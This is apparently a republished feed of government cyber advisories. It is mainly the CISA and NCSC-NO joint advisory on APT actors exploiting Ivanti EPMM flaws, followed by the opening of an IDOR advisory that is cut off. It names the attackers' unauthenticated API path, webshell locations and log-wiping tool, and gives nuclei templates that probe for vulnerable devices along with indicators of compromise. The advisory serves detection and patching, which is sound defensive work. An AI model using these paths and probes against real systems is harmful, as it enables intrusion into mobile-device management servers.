ACSC Advisory:
2021-007: Log4j vulnerability – advice and mitigations
ACSC Publication:
Log4j: What Boards and Directors Need to Know
CVE-2021-45046
Apache
Log4j 2.15.0
Apache Log4j Security Vulnerabilities
CVE-2022-42475
Fortinet
FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and
FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier
FortiOS – heap-based buffer overflow in sslvpnd
CVE-2022-24682
Zimbra
Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1) Collaboration Suite
Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release
CVE-2022-22536
SAP
NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM)
Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher
CISA Alert:
Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM)
CVE-2022-22963
VMware Tanzu
Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions
CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression
CVE-2022-22954
VMware
Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
Identity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3
vRealize Automation (vIDM), 8.x, 7.6
VMware Cloud Foundation (vIDM), 4.x
vRealize Suite Lifecycle Manager (vIDM), 8.x
Workspace ONE Access and Identity Manager
VMware Advisory VMSA-2022-0011
CVE-2022-22960
VMware
Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
Identity Manager (vIDM) and vRealize Automation 3.3.6, 3.3.5, 3.3.4, 3.3.3
vRealize Automation (vIDM), 8.x, 7.6
VMware Cloud Foundation (vIDM), 4.x
VMware Cloud Foundation (vRA), 3.x
vRealize Suite Lifecycle Manager (vIDM), 8.x
VMSA-2022-0011
CVE-2022-29464
WSO2
WSO2 API Manager 2.2.0 and above through 4.0.0
WSO2 Identity Server 5.2.0 and above through 5.11.0
WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0
WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0
WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0
WSO2 Documentation – Spaces
CVE-2022-27924
Zimbra
Zimbra Collaboration Suite, 8.8.15 and 9.0
Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release
CVE-2022-1388
F5 Networks
F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions
K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
Joint CSA:
Threat Actors Exploiting F5 BIG-IP CVE-2022-1388
CVE-2022-30190
Microsoft
Exchange Server, Multiple Versions
CISA Alert:
Microsoft Releases Workaround Guidance for MSDT “Follina” Vulnerability
CVE-2022-22047
Microsoft
Multiple Products
Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047
CVE-2022-27593
QNAP
Certain QNAP NAS running Photo Station with internet exposure; Asustor Network Attached Storage
DeadBolt Ransomware
CVE-2022-41082
Microsoft
Exchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23
Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082
ACSC Alert:
Vulnerability Alert – 2 new Vulnerabilities associated with Microsoft Exchange.
CVE-2022-40684
Fortinet
FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0
FortiOS / FortiProxy / FortiSwitchManager – Authentication bypass on administrative interface
Source de l’article sur us-cert.gov
Threat Actors Exploiting Ivanti EPMM Vulnerabilities
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information
SUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.
Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.
CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.
Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.
This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt for compromise. CISA and NCSC-NO encourage organizations to hunt for malicious activity using the detection guidance in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA. If no compromise is detected, organizations should still immediately apply patches released by Ivanti.
Download the PDF version of this report:
Download the .xml or .json file associated with this report:
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Overview
In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager (EPMM), formerly known as MobileIron Core, to target a Norwegian government network. Ivanti confirmed that the threat actors exploited CVE-2023-35078 and released a patch on July 23, 2023.[1] Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability, CVE-2023-35081, and released a patch for the second vulnerability on July 28, 2023.[2]
CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. The vulnerability allows unauthenticated access to specific application programming interface (API) paths. Threat actors with access to these API paths can access PII such as names, phone numbers, and other mobile device details of users on the vulnerable system; make configuration changes to vulnerable systems; push new packages to mobile endpoints; and access Global Positioning System (GPS) data if enabled.
According to Ivanti, CVE-2023-35078 can be chained with a second vulnerability CVE-2023-35081.[2] CVE-2023-35081 is directory traversal vulnerability [CWE-22] in EPMM. This vulnerability allows threat actors with EPMM administrator privileges the capability to write arbitrary files, such as webshells, with operating system privileges of the EPMM web application server. The actors can then execute the uploaded file.[2]
CISA added CVE-2023-35078 to its Known Exploited Vulnerabilities Catalog on July 25, 2023, and CVE-2023-35081 on July 31, 2023.
CISA and NCSC-NO are concerned about the potential for widespread exploitation of both vulnerabilities in government and private sector networks because MDM systems provide elevated access to thousands of mobile devices. Threat actors, including APT actors, have previously exploited a MobileIron vulnerability [3],[4].
APT Actor Activity
The APT actors have exploited CVE-2023-35078 since at least April 2023. The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy [T1090] to target infrastructure, and NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and to query `/mifs/aad/api/v2/authorized/users` to list users and administrators [T1087.002] on the EPMM device.
The APT actors deleted some of their entries in Apache httpd logs [T1070] using `mi.war`, a malicious Tomcat application that deletes log entries based on the string in `keywords.txt`. The actors deleted log entries containing the string `Firefox/107.0`.
The APT actors used Linux and Windows user agents with `Firefox/107.0` to communicate with EPMM. Other agents were used; however, these user agents did not appear in the device logs. It is unconfirmed how the threat actors ran shell commands on the EPMM device; however, NCSC-NO suspects the actors exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands [T1059].
The APT actors tunneled traffic [T1572] from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet [T1090.001]. It is unknown how they tunneled traffic. NCSC-NO observed that the network traffic used the TLS certificate of the internal Exchange server. The APT actors likely installed webshells [T1505.003] on the Exchange server in the following paths [T1036.005]:
/owa/auth/logon.aspx
/owa/auth/logoff.aspx
/owa/auth/OutlookCN.aspx
NCSC-NO also observed `mi.war` on Ivanti Sentry but does not know how the actors placed it there.
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 1—Table 7 for all referenced threat actor tactics and techniques in this advisory.
Table 1: APT Actors ATT&CK Techniques for Initial Access
Technique Title
ID
Use
Exploit Public-Facing Application
T1190
The APT actors exploited CVE-2023-35078 in public facing Ivanti EPMM appliances since at least April 2023.
Table 2: APT Actors ATT&CK Techniques for Execution
Technique Title
ID
Use
Command and Scripting Interpreter
T1059
The APT actors may have exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands.
Table 3: APT Actors ATT&CK Techniques for Discovery
Technique Title
ID
Use
Account Discovery: Domain Account
T1087.002
The APT actors exploited CVE-2023-35078 to gather EPMM device users and administrators.
Remote System Discovery
T1018
The APT actors retrieved LDAP endpoints.
Table 4: APT Actors ATT&CK Techniques for Persistence
Technique Title
ID
Use
Masquerading: Match Legitimate Name or Location
T1036.005
The APT actors likely installed webshells at legitimate Exchange server paths.
Server Software Component: Web Shell
T1505.003
The APT actors implanted webshells on the compromised infrastructure.
Table 5: APT Actor ATT&CK Techniques for Defense Evasion
Technique Title
ID
Use
Indicator Removal
T1070
APT actors deleted httpd access logs after the malicious activities took place, matching entries on the string `Firefox/107.0`.
Table 6: APT Actor ATT&CK Techniques for Collection
Technique Title
ID
Use
Data from Local System
T1005
APT actors regularly checked EPMM Core audit logs.
Table 7: APT Actor ATT&CK Techniques for Command and Control
Technique Title
ID
Use
Protocol Tunneling
T1572
The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.
Proxy
T1090
The actors leveraged compromised SOHO routers to proxy to and compromise infrastructure.
The actors tunneled traffic from the internet to at least one Exchange server.
Proxy: Internal Proxy
T1090.001
The APT actors tunneled traffic from the internet to an Exchange server that was not accessible from the internet.
EVIDENCE OF VULNERABILITY METHODS
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35078:
id: CVE-2023-35078-Exposure
info:
name: Ivanti EPMM Remote Unauthenticated API Access
author: JC
severity: critical
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-35078
description: Identifies vulnerable instances of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10, which allow remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass.
tags: ivanti, mobileiron, epmm, auth-bypass
requests:
- method: GET
path:
- "{{RootURL}}/mifs/aad/api/v2/ping"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "vspVersion"
- "apiVersion"
condition: and
CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081:
id: CVE-2023-35081
info:
name: Ivanti EPMM Remote Arbitrary File Write
author: JC
severity: High
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-35081
description: Identifies vulnerable unpatched versions of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10.0.3, 11.9.1.2, and 11.8.1.2 that allow an authenticated administrator to perform arbitrary file writes to the EPMM server.
tags: ivanti, mobileiron, epmm
requests:
- method: GET
path:
- "{{RootURL}}/mifs/c/windows/api/v2/device/registration"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: all
regex:
- '.*?VSP ((0?[0-9]|10)(\.\d+){1,3}|11\.(0?[0-7])(\.\d+){1,2}|11\.8\.0(\.\d+)?|11\.8\.1\.[0-1]|11\.9\.0(\.\d+)?|11\.9\.1\.[0-1]|11\.10\.0\.[0-2]).*'
Run the following NCSC-NO-created checks to check for signs of compromise:
Check syslogs from EPMM devices for any occurrences of `/mifs/aad/api/v2/`.
Check for `EventCode=1644` in the AD since at least April 2023. The LDAP queries performed by EPMM when the threat actor used the MIFS API generated tens of millions of this event code. Also look for EventCodes `4662`, `5136`, and `1153`.
Check for `CN=EXCHANGE01` or similar.
INCIDENT RESPONSE
If compromise is detected, organizations should:
MITIGATIONS
CISA and NCSC-NO recommend organizations:
Install the Ivanti security update RPM (the published listing was truncated to ".noarch.rp"; the package name ends in .rpm). Verify the package against the checksum or signature Ivanti publishes before installing it:
# install rpm url https://support.mobileiron.com/ivanti-updates/ivanti-security-update-1.0.0-1.noarch.rpm
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA and NCSC-NO recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
REFERENCES
[1] Ivanti: CVE-2023-35078 – Remote Unauthenticated API Access Vulnerability
[2] Ivanti: CVE-2023-35081 – Remote Arbitrary File Write
[3] CISA: Potential for China Cyber Response to Heightened U.S.-China Tensions
[4] CISA: Top Routinely Exploited Vulnerabilities
RESOURCES
ACKNOWLEDGEMENTS
Ivanti contributed to this joint advisory.
NCSC-NO wishes to acknowledge Mnemonic’s contributions.
VERSION HISTORY
August 1, 2023: Initial version.
August 2, 2023: Added stix file, updated Acknowledgements section, and added Resources section.
APPENDIX: INDICATORS OF COMPROMISE
NCSC-NO observed the following webshell hash (SHA-1):
c0b42bbd06d6e25dfe8faebd735944714b421388
NCSC-NO observed the following SHA-1 hash of mi.war:
1cd358d28b626b7a23b9fd4944e29077c265db46
NCSC-NO observed the following JA3 hashes used against MobileIron Core:
2d5bd942ebf308df61e1572861d146f6
473cd7cb9faa642487833865d516e578
579ccef312d18482fc42e2b822ca2430
849d3331f3e07a0797a02f12a6a82aa9
8d9f7747675e24454cd9b7ed35c58707
ad55557b7cbd735c2627f7ebb3b3d493
cd08e31494f9531f560d64c695473da9
e1d8b04eeb8ef3954ec4f49267a783ef
e60dc8370ecf78cf115162fbc257baf5
e669667efb41c36f714c309243f41ca7
e84a32d43db750b206cb6beed08281d0
eb5fdc72f0a76657dc6ea233190c4e1c
NCSC-NO observed the following JA3 hashes used against Exchange when tunneling via EPMM Sentry. Note: a JA3 value fingerprints a TLS client's ClientHello (cipher suites, extensions, curves), not an actor; many such values are also produced by common browsers and libraries, so use them to pivot and correlate with the other indicators in this appendix rather than as standalone block rules:
0092ce298a1d451fbe93dc4237053a96
00e872019b976e69a874ee7433038754
01ecd9ab9be75e832c83c082be3bdf18
0212a88c7ed149febdefa347c610b248
02be3b93640437dbba47cc7ed5ab7895
03f8852448a85e14f2b4362194160c32
045f8ccdac6d4e769b30da406808da71
04e7f5787f89a597001b50a37b9f8078
070f9fe9f0ec69e6b8791d280fde6a48
07a624d7236cca3934cf1f8e44b74b52
09df72c01a1a0ad193e2fff8e454c9c4
0b28842d64a344c287e6165647f3b3fe
0b8e1211de50d244b89e6c1b366d3ccf
0cb0380cf75a863b3e40a0955b1ada9f
0da24834056873a8cd8311000088e8be
0e1fad8ffaa7a939f0a6cbf9cd7e2fcd
0f6e78839398c245d13f696a3216d840
119f8c9050d1499b6f958b857868b8ce
11c506d5e3fb7e119c4287202c96a930
1336df27f94b25a25acac9db3e61e461
14671c3f8deca7d73a03b74cb854c21d
146caf9bd0153428f54e9ef472154983
14994353f3ea6fd25952a8c7d57f9ecf
151bc875df15d1385e6eb02f9edaba06
15a074a397727b26a846b443b99c20ff
1660f3d882a4311ca013ee4586e01fd9
16a74fc216f8a4ce43466bb83b6d3fd2
188623fdd056c4ed13d1ff34c7377637
19f51486abd40c9f0fc0503559a6c523
1a024e63721c610d2e54e67d62cd5460
1aa7dae8f2ae0a29402ed51819f82db4
1abfdeaadb74a0f7c461e7bab157b17f
1b6720ed0b67c910a80722ce973d6217
1b7d9368c6ce7623fdbc43f013626535
1e0850e10a00c9bbdd5c582ff4cb6833
1ec71612e438cf902913eec993475eb9
206fed3a39d9215c35395663f5bb3307
22cc1b3bc9f99d3a520ae58fee79a0d5
23e3e6fa8b23d9bc19e82de4e64c79e9
253fd4659bf21be116858bc0f206c5b9
276e175d4fe8454c4c47e966d8cb3fa3
289a450c7478dd52a10c6ed2fb47f7e9
2aa8ba7478b1362274666d714df575bc
2beecb6b9e386f29d568229a9953c3d2
2ebc7fdceaa9a0df556e989d77157006
3003024afe64b4e8a5a30825c14bbb12
3082e669dda9d023e2dcd8b9549a84a8
309d33c6f77a3fc75654c44c61596ccd
30a9f568eb3df79352fc587a078623b6
30be84e6b95f44c203f8e7fce7339a8e
3268a5097a543c7dbd82c39a9193b7fe
32775ead3ea1ad7db2f4bea67fe0cabb
34ac9a6ef5d285119abec50fbe41fcfe
34d92552e278710c1e84f0bd8dc3a6b8
361f47a6357cc6e3a9bcdd20cfaaf0e9
3685abc75517e61e47e52e5f2d060f54
3744004013135b9f9a05cb58cda8134d
37d952966ea7e79277803f13d7147544
391a4c2c7541b8b78e2f99bf586e9794
393662e5aa0cb49c5d666a6d10a1ade6
3962b622c5aa815afb803b92aa948424
3b22af324abded2781ed8f6a61f3654f
3b30b4555cc8b4b164ad03cf322cbea8
3bd1bdb5e90b9590a8878bff2ada8204
3be529eb3a7daaf34f963a22188f6139
3dd13faad1c45eb0c23e4567210f7eac
403273b51f91cf3c333695e5532cb2c3
404f56045e436d53ead2177bf957ba39
41854adbc73b0b58e5c566f60bb0df25
43c22dabb1e6d2449a39c2f7e974d537
476e72bbda5b78d188766139889e3038
4898a51256ae7d914a5ffd5695973470
49230c486f0fd383cd301fe162d6a786
4959a611b9885022d81b4bc8e4b1d149
495c6ff7ca0379ad0891bac47917d09a
49d2bd08038dc7dada221008591940f9
4c1b73ec52e6eec0c5d20577fcbc9ef1
4d34db639ba84b11822fb3dac47ed7d1
5244b163f9326a1e5eaa8860f7543f99
539f1a5183800a96228458932f9307f7
5466368d4659f1b1470bcb09e65b484d
549cde6535a884126755fc53f59a820c
555389e92c622b87d3fc395fd8723501
588d0b42e54174a98e1eca59945e8b32
58bc21d305a65c41745327f142f3ac12
59401c9a60449c742d073d93d1b7039a
59eec218522cc5c7743a0d37892a3345
59faf75430e9326d3ae9d231bb3ae8c6
5d0259ca16cfc2d7d1b0fac69f29ab05
5d55026fb84dba91ac01e2095504b1bc
5e35f50c692081fd6c7ddac1272e2d6c
5f4d5965af741bba59b7c8d3425f33dd
6010282004917ecf3900babf61456432
6088c2a04c94cdcd5a283a6d1622ffba
61dee38d2f97220efb1218ad8971e3ab
62ac194f2526eb45485526bca35c8f43
634296a023280d020674c873d0199760
635755dadfab8b92fb502aafb09122db
63fc58be0d7b48eaa34da7f752ae8ae6
6441640409815cfb4bf469e685e1bdb5
646973d1928c401ba80961c12cbf84a2
65eef0a0ee257254ef0418aa57192cfb
66f6a192083a7ab00ae8e0b5cc52e8f4
67a42e2e27ffc26d1f3d0ceb8384afd0
689385f1218e0d4c347595648ca6a776
692f91c0c5e9e93e0a24bd3392887ca1
69ecf52960c8bd9e746dfe9ee19c11f6
6e359f3bbc622e9b1ed36f6e3d521bcf
6e3650528f719fc50988a1f697644832
6ead0d5d3f87911c27f3ae0a75e6b5bc
6f1fa8b444caf0d8238f948279ca74e1
6fb8cdf567dd7d89d53b5771d769cb5f
706b6055658aff067ae370f23831ef6b
708140c311d3d69418f75c928e7535a0
719ec5da8f2153a436ee8567ff609894
7292ef4cdca529071fad97496e1c9439
74871691eac48156ce0da2cfa3ab401a
74cf24f2a66a31c88b6fcfe01f12160c
75e874d8e0a79697633b87ea5e798b1c
76c0d09fed2f33babb0de8ee2c07144c
77a01363fa2b29af25c004da9570e23c
78988c65e9b70e7929e747408d8f0b0e
79c6d12d168b85437384b20eb94e106b
7b4137b4e85f31a81bb5bafeda993947
7b9db1d58326c1fa276ba2a39bcc2617
7cbc7459db5327c26476549f225030f5
7cd727171c2522f51417edeeba4f1791
7e3630c67c802eabb67b108ad4d7ded7
802f5d34c230da40c0912a1c5a9b702b
80bd0f3610f6c4d60584a5be0b8a3016
819030799f0020ed724c2ef3ffaa56c6
8207129585da68066ed08e94216d76ee
821f649d08687e22f96cea99fbb5d3a3
830838cb0620d659405a74401cd72557
833d3201066f5184c874c73a2083c448
840f488b7c0a5d686d1e89908735f354
84301b967a4d9a242466c04901bad691
85c3fac6a9885362c448f434671e362f
883b9fe16e45c388968defc73a5fba7a
8a6b0ba3496eeca39d6d3f9bae830c90
8ad0fd4b78c89bd63b97343fda1eeccb
8b0ae9029974091df12210255aaecad6
8b297f8b219e968932293ee7a8242ca3
8bb1781e756a53cd00d9b2ec670fa21e
8d5515351afdf27b013f96a05bf45147
8fafa73e9985e05d0c1c964da770c567
905967b08bd44cfa60d969229921ac23
9188ef45ea917a91ec9b92b5dd8cd90d
918dfab0333ae15d61f14fd24b5eaaac
922a3272aad17c9eaad733696a4321da
9253399537fad8448f1d4732dd79f6fa
934a8a6528e91caa019acb76e791a71d
95588e0386206fa02912cfcaf18c1220
9610328cdaa4694800c2c93410f8ce82
9622902cc43f4a20d0d686a37e4d8232
96c41e4c4a1812187fb279b9299ad63b
984c4653a563b19c87f264611a6adc01
9980febfaf901d4113a1c473f79d7eb6
9a176d818edff838fc057cea3ee372c0
9ba21c5148913186a5bf877078cbc048
9cfda02ef7e04c469b77f8197a249c17
9d74d395bd2f72a47a5c980e6040df5a
9df128ebe0c82064aa746647883112c9
9e5613533972a9d42d2e3344a4e58566
9ec17429eed5446e3720796ab50d8c60
9f2438aaab4744c4b7b5b7287a783099
9f3bf94572344b36f6ef1689cb30c66e
9fdd7a85b3a4ef8ded73beb3e6218109
a1b732a9af792f75a68ed78d72ffb8f6
a260d836428cdb971bdf147ca6940160
a4f11b1eb659869a0ae70898a4a0e5ee
a596ebbcf438980c880d711315e4fdf1
a80b6a354b493264f37aa39d0d41b5fc
a89df6156eb5a2de196388d4a123b470
a96837fe533247abb7f88000d0216a50
a98cf0a359f430a00f4f3d522f5b6cc0
aa2fe3a253e169b05e1782ca57a688d2
aef0172a2c03f77912de0bbf14aee00f
af06c3e72f2f307515ba549174d8e5a6
b311ab82b30f41b12cb9089d00c4a1ff
b4f31423445b5f13675f205ac997f41f
b50666c9aed1c2f222c56b6e9b326d27
b53f179b3f25f72bb0c7ccf45bf8beee
b57f3e41c03803306b0ee2111f7ef823
b79434613820faf30d58f103c4415a29
b8366aaa5ed51c0dea3fc90ef7e14889
b8f6b0d234a305c25411e83fd430c624
b956ed2b848dabb4e79ab7358233861b
b9ecb08402df0f1f6e1ce76b8ad6e91f
ba4a616c8d4ab9358a82b321d8e618bf
bcd62f3e029f96f62c24d50d2d1402ac
bcf75736d176394f3df69f3e0ef7dd9f
be1f24457141d80206bc2e58f55dc879
c013f308d170aa2eca4a5b0f0bbd3ccb
c0a2fd066c955137036f92da2c3a3ff1
c17b3ec40ed5216e44311138aafaea2c
c262a39f49604f05a5656213f758cd46
c66f36eb180438882133717c3abb5157
c986c7bf720ce1463c3d628d2b3dad01
c9c16287cbbe5a037244e374ba84aecc
cbcd728a2350712b5747cd3447473deb
cbeeb123efe8cf7f842426b673415c28
ccb15eef4287c8efa472915bcb4ec458
ccdddb69e9344a039c4ac9c49a6f2d7b
cd1312be032256a10cf866af3e9afae9
ce0dd163d9e02bfd42d61024523cb134
ceef2e728db1b5ae15432f844eeb66e1
d12d98a0877f6e3c8b5a59f41cc4de9b
d131f17689f1f585e9bfdcdb72a626bb
d173076d97a0400a56c81089912b9218
d255291bb8e460626cb906ebacc670e5
d2cea317778ad6412c458a8a33b964fd
d3cfee76468a9556fd9d017c1c8ee028
d3d72f4c7038f7313ad0570e16c293bf
d485a1b5db2f97dc56500376d677aa89
d662d20507bebc37b99a4d413afa2752
d711d577b9943ab4e2f8a2e06bb963e3
d92e87d2689957765987e2be732d728e
d966c6c822122e96f6e9f5f1d4778391
daee31d7cc6e08ead6afad2175989e1d
dbb293176747fa1c2e03cbc09433f236
dc26ef761c7ec40591b1fe6e561b521d
dc9e6edeb7557bc80be68be15cebb77a
dddfbae77336120febd5ad690af3e341
e1f579227327ebb21cde3f9e7511db01
e3c642432a815a07f035e01308aaa8fc
e54329351788661f2a8d4677a759fc42
e82b7ad2c05f4617efbc86a78c1e61e9
e99cffa2afa064625f09e1c5aca8f961
ea6bd3db104ca210b5ad947d46134aaf
eb277d809a59d39d02605c0edd9333e9
ed82a50d98700179c8ae70429457477a
ef35374f4146b3532f0902d6f7f0ef8c
ef4c4d79f02ac404f47513d3a73e20c7
f05a5a60ad6f92d6f28fa4f13ded952f
f0776dfe17867709fdb0e0183ed71698
f20fbfd508e24d50522eadf0186b03eb
f3d751b0585855077b46dfce226cfea1
f4dd9bb28d680a3368136fb3755e7ea9
f804388f302af1f999e4664543c885a1
f8bcc8f99a3afde66d7f5afb5d8f1b43
f8d6f89aecf792e844e72015c9f27c95
f967460f8c6de1cedb180c90c98bfe98
f9d5cc0cbae77ea1a371131f62662b6b
fa4f1a3b215888bc5f19b9f91ba37519
fdff2bf247a7dad40bac228853d5a661
fe6e7fac4f0b4f25d215e28ca8a22957
fe9de1cdd645971c5d15ee1873c3ff8d
febba89b4b9a9649b3a3bf41c4c7d853
NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS). Note: these are common browser strings, so a User-Agent match is weak evidence on its own; correlate with the source of the request (e.g., whether it arrives via the EPMM Sentry), the JA3 values above, and timing:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
NCSC-NO observed the following user agents communicating with Exchange webshell:
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A306 Safari/6531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Mozilla/5.0 (Linux; Android 7.0; Moto C Build/NRD90M.059) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.02272.101 Safari/537.36
Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J120M Build/LMY47X) AppleWebKit/537.36 (KHTML, Like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 9_0_2 like Mac OS X) AppleWebKit/601.1.45 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1
NCSC-NO observed the following user agents communicating with Exchange Autodiscover:
ExchangeServicesClient/15.00.0913.015
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/114.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.0.0
NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx):
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 Edg/103.0.1264.49
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
NCSC-NO observed the following user agent communicating with Exchange (/powershell):
Windows WinRM Client
Preventing Web Application Access Control Abuse
SUMMARY
The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), U.S. Cybersecurity and Infrastructure Security Agency (CISA), and U.S. National Security Agency (NSA) are releasing this joint Cybersecurity Advisory to warn vendors, designers, and developers of web applications and organizations using web applications about insecure direct object reference (IDOR) vulnerabilities. IDOR vulnerabilities are access control vulnerabilities enabling malicious actors to modify or delete data or access sensitive data by issuing requests to a website or a web application programming interface (API) specifying the user identifier of other, valid users. These requests succeed where there is a failure to perform adequate authentication and authorization checks.
These vulnerabilities are frequently exploited by malicious actors in data breach incidents because they are common, hard to prevent outside the development process, and can be abused at scale. IDOR vulnerabilities have resulted in the compromise of personal, financial, and health information of millions of users and consumers.
ACSC, CISA, and NSA strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce prevalence of IDOR flaws and protect sensitive data in their systems.
Download the PDF version of this report:
TECHNICAL DETAILS
Description
